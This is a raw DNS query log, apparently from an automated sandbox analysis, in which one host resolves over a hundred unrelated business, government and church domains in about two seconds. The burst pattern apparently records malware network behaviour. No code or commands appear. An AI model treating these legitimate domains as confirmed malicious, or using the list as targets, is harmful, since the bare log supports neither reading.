                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.148303032 CEST8.8.8.8192.168.2.30x5347No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.151410103 CEST8.8.8.8192.168.2.30xcb7No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.151540995 CEST8.8.8.8192.168.2.30xf738No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.157962084 CEST8.8.8.8192.168.2.30x1ea9No error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.163032055 CEST8.8.8.8192.168.2.30x8b16No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.164627075 CEST8.8.8.8192.168.2.30x8797No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.167766094 CEST8.8.8.8192.168.2.30xbff5Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.167841911 CEST8.8.8.8192.168.2.30xb2c0No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.169646025 CEST8.8.8.8192.168.2.30xb800No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.171607018 CEST8.8.8.8192.168.2.30x11b0No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.206156969 CEST8.8.8.8192.168.2.30xc58fNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.208873987 CEST8.8.8.8192.168.2.30x7ef0Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.211209059 CEST8.8.8.8192.168.2.30x59f8No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.217093945 CEST8.8.8.8192.168.2.30x7505No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.219717979 CEST8.8.8.8192.168.2.30x95d6No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.220019102 CEST8.8.8.8192.168.2.30x305bNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.221157074 CEST8.8.8.8192.168.2.30xea92No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.221631050 CEST8.8.8.8192.168.2.30xf6caNo error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.226123095 CEST8.8.8.8192.168.2.30xa2dcNo error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.226123095 CEST8.8.8.8192.168.2.30xa2dcNo error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.244278908 CEST8.8.8.8192.168.2.30x414No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.273919106 CEST8.8.8.8192.168.2.30x3c13No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.273919106 CEST8.8.8.8192.168.2.30x3c13No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.273919106 CEST8.8.8.8192.168.2.30x3c13No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.279772997 CEST8.8.8.8192.168.2.30xd9efNo error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.279772997 CEST8.8.8.8192.168.2.30xd9efNo error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.280760050 CEST8.8.8.8192.168.2.30xb449No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.286981106 CEST8.8.8.8192.168.2.30x73f2No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.294076920 CEST8.8.8.8192.168.2.30x2a6bNo error (0)anduran.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.294076920 CEST8.8.8.8192.168.2.30x2a6bNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.294076920 CEST8.8.8.8192.168.2.30x2a6bNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.294076920 CEST8.8.8.8192.168.2.30x2a6bNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.301918030 CEST8.8.8.8192.168.2.30x242cNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.323151112 CEST8.8.8.8192.168.2.30x6de6No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.323151112 CEST8.8.8.8192.168.2.30x6de6No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.333036900 CEST8.8.8.8192.168.2.30x2dd9No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.333036900 CEST8.8.8.8192.168.2.30x2dd9No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.334117889 CEST8.8.8.8192.168.2.30xbd1cName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.345149040 CEST8.8.8.8192.168.2.30xcc76No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.352643013 CEST8.8.8.8192.168.2.30xc77cNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.352881908 CEST8.8.8.8192.168.2.30xbd3eNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.354073048 CEST8.8.8.8192.168.2.30x821fNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.354870081 CEST8.8.8.8192.168.2.30xb15fNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.383527994 CEST8.8.8.8192.168.2.30xa292Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.383586884 CEST8.8.8.8192.168.2.30xfc67No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.426776886 CEST8.8.8.8192.168.2.30x71cfNo error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.432820082 CEST8.8.8.8192.168.2.30x5797No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.434355021 CEST8.8.8.8192.168.2.30xbc05No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.446177959 CEST8.8.8.8192.168.2.30x3d4No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.446573973 CEST8.8.8.8192.168.2.30xb582No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.468310118 CEST8.8.8.8192.168.2.30xd61cNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.468542099 CEST8.8.8.8192.168.2.30x5b21No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.485090971 CEST8.8.8.8192.168.2.30x23e3No error (0)arowines.com75.2.18.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.488956928 CEST8.8.8.8192.168.2.30xae47No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.510128975 CEST8.8.8.8192.168.2.30xa9c0No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.525393009 CEST8.8.8.8192.168.2.30x959eNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.528564930 CEST8.8.8.8192.168.2.30x8d7dNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.566792965 CEST8.8.8.8192.168.2.30x38d3Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.579711914 CEST8.8.8.8192.168.2.30x5d01No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.585796118 CEST8.8.8.8192.168.2.30x9538No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.632801056 CEST8.8.8.8192.168.2.30x12e0Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.645390034 CEST8.8.8.8192.168.2.30xad22No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.646980047 CEST8.8.8.8192.168.2.30x8e91No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.650614023 CEST8.8.8.8192.168.2.30x9f52Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.656033993 CEST8.8.8.8192.168.2.30x16c4No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.665628910 CEST8.8.8.8192.168.2.30x91ebName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.682286024 CEST8.8.8.8192.168.2.30x3106No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.707195044 CEST8.8.8.8192.168.2.30xe7e3No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.772013903 CEST8.8.8.8192.168.2.30xbb95No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.868949890 CEST8.8.8.8192.168.2.30x224No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.884426117 CEST8.8.8.8192.168.2.30x9625No error (0)assideum.com52.219.98.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.886322021 CEST8.8.8.8192.168.2.30x86efNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.886322021 CEST8.8.8.8192.168.2.30x86efNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.890322924 CEST8.8.8.8192.168.2.30xf8a7No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.914026022 CEST8.8.8.8192.168.2.30x1820No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.924397945 CEST8.8.8.8192.168.2.30x954No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.934608936 CEST8.8.8.8192.168.2.30x8c33Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.935462952 CEST8.8.8.8192.168.2.30xfb35No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.949934959 CEST8.8.8.8192.168.2.30xbfabNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.960310936 CEST8.8.8.8192.168.2.30x313fNo error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.966830015 CEST8.8.8.8192.168.2.30x3611No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.969350100 CEST8.8.8.8192.168.2.30x1844No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.016088009 CEST8.8.8.8192.168.2.30xecc8No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.016088009 CEST8.8.8.8192.168.2.30xecc8No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.016088009 CEST8.8.8.8192.168.2.30xecc8No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.016088009 CEST8.8.8.8192.168.2.30xecc8No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.016387939 CEST8.8.8.8192.168.2.30xbe9aNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.036158085 CEST8.8.8.8192.168.2.30xe43bNo error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.069017887 CEST8.8.8.8192.168.2.30xa96aNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.069017887 CEST8.8.8.8192.168.2.30xa96aNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.069017887 CEST8.8.8.8192.168.2.30xa96aNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.079884052 CEST8.8.8.8192.168.2.30x3d15No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.095665932 CEST8.8.8.8192.168.2.30xdd31No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.125386953 CEST8.8.8.8192.168.2.30x94a2No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.221546888 CEST8.8.8.8192.168.2.30x6864No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.248555899 CEST8.8.8.8192.168.2.30x7eefNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.248555899 CEST8.8.8.8192.168.2.30x7eefNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.249979019 CEST8.8.8.8192.168.2.30x4e2bNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.249979019 CEST8.8.8.8192.168.2.30x4e2bNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.257153988 CEST8.8.8.8192.168.2.30x278No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.319742918 CEST8.8.8.8192.168.2.30x5cf6No error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.328800917 CEST8.8.8.8192.168.2.30xc3daNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.328800917 CEST8.8.8.8192.168.2.30xc3daNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.356215000 CEST8.8.8.8192.168.2.30x602cNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.518635988 CEST8.8.8.8192.168.2.30xbfd3No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.549477100 CEST8.8.8.8192.168.2.30xad84No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.574743986 CEST8.8.8.8192.168.2.30xa161No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.585088015 CEST8.8.8.8192.168.2.30x4611No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.591146946 CEST8.8.8.8192.168.2.30xabfeNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.612257957 CEST8.8.8.8192.168.2.30xa41aNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.612257957 CEST8.8.8.8192.168.2.30xa41aNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.612411976 CEST8.8.8.8192.168.2.30x7ac1Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.616688013 CEST8.8.8.8192.168.2.30xd362No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.665879965 CEST8.8.8.8192.168.2.30x3a58Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.679146051 CEST8.8.8.8192.168.2.30x65f1No error (0)assideum.com52.219.178.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.683363914 CEST8.8.8.8192.168.2.30x8948No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.691052914 CEST8.8.8.8192.168.2.30xf58No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.691052914 CEST8.8.8.8192.168.2.30xf58No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.707297087 CEST8.8.8.8192.168.2.30x98b3Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.714929104 CEST8.8.8.8192.168.2.30x11dfNo error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.714929104 CEST8.8.8.8192.168.2.30x11dfNo error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.726202011 CEST8.8.8.8192.168.2.30x90ebNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.759274960 CEST8.8.8.8192.168.2.30x1f37No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.759274960 CEST8.8.8.8192.168.2.30x1f37No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.761990070 CEST8.8.8.8192.168.2.30x8480No error (0)rkengg.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.761990070 CEST8.8.8.8192.168.2.30x8480No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.761990070 CEST8.8.8.8192.168.2.30x8480No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.761990070 CEST8.8.8.8192.168.2.30x8480No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.796792030 CEST8.8.8.8192.168.2.30x8444No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.823690891 CEST8.8.8.8192.168.2.30x741aNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.835189104 CEST8.8.8.8192.168.2.30xa3adNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.852054119 CEST8.8.8.8192.168.2.30xedd5No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.854289055 CEST8.8.8.8192.168.2.30x68a0No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.854665995 CEST8.8.8.8192.168.2.30x9b13No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.859057903 CEST8.8.8.8192.168.2.30xc6deNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.861670971 CEST8.8.8.8192.168.2.30x3151No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.861670971 CEST8.8.8.8192.168.2.30x3151No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.861670971 CEST8.8.8.8192.168.2.30x3151No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.861670971 CEST8.8.8.8192.168.2.30x3151No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.874267101 CEST8.8.8.8192.168.2.30xd508No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.909120083 CEST8.8.8.8192.168.2.30x8035No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.929128885 CEST8.8.8.8192.168.2.30x1c0dNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.934802055 CEST8.8.8.8192.168.2.30xc385Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.967588902 CEST8.8.8.8192.168.2.30x9592No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.968003035 CEST8.8.8.8192.168.2.30x431No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.992362976 CEST8.8.8.8192.168.2.30x66e1No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.992362976 CEST8.8.8.8192.168.2.30x66e1No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.058301926 CEST8.8.8.8192.168.2.30x54ceNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.069771051 CEST8.8.8.8192.168.2.30x5bb2No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.168756008 CEST8.8.8.8192.168.2.30x92b6No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.178037882 CEST8.8.8.8192.168.2.30x2338No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.178037882 CEST8.8.8.8192.168.2.30x2338No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.190135956 CEST8.8.8.8192.168.2.30x3b47No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.255359888 CEST8.8.8.8192.168.2.30xb1bNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.262584925 CEST8.8.8.8192.168.2.30xbb68No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.302923918 CEST8.8.8.8192.168.2.30x59f0No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.302923918 CEST8.8.8.8192.168.2.30x59f0No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.309375048 CEST8.8.8.8192.168.2.30x2317No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.328228951 CEST8.8.8.8192.168.2.30xbfd8No error (0)cpmteam.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.328228951 CEST8.8.8.8192.168.2.30xbfd8No error (0)cpmteam.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:00.374963999 CEST8.8.8.8192.168.2.30xaa32No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
